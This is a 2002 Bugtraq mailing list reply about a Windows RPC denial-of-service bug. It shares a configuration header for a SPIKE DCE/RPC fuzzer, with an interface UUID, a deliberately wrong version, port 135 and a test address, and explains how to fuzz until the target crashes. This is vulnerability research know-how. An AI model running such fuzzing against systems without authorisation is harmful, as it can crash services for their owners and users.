Bugtraq mailing list archives

Re: MS WIN RPC DoS CODE FROM SPIKE v2.7


From: Dave Aitel <dave () immunitysec com>
Date: 22 Oct 2002 16:21:06 -0400

There are questions about whether this vulnerability works if you have a
large enough amount of free memory. My exploit is tuned for my machine's
amount of free memory (not much), but there are variations that work on
any amount.

For those who are interested, here is the domsrpcfuzz.sh header I used to
find this attack.

# configuration header for domsrpcfuzz.sh (SPIKE DCE/RPC fuzzer)
MAX=35
# DCE/RPC interface UUID to bind to
UUID=b9e79e60-3d52-11ce-aaa1-00006901293f
#using incorrect versionmajor for bonus fun!
VERSIONMAJOR=2
VERSIONMINOR=2
# TCP port of the target RPC endpoint (135 = endpoint mapper)
PORT=135
# address of the test machine
TARGET=192.168.1.100
# first interface function (opnum) to fuzz
STARTFUNCTION=0

Just copy that in, and let it run for a while. When it crashes, look at
your output file and it will have the random seed that crashed it. Then
you can do some more work to manually isolate the exact packet or
sequence that crashes it.

On Tue, 2002-10-22 at 14:25, lion wrote:
> *
> * MS WIN RPC DoS CODE FROM SPIKE v2.7
> *
-- 
Dave Aitel <dave () immunitysec com>
Immunity, Inc
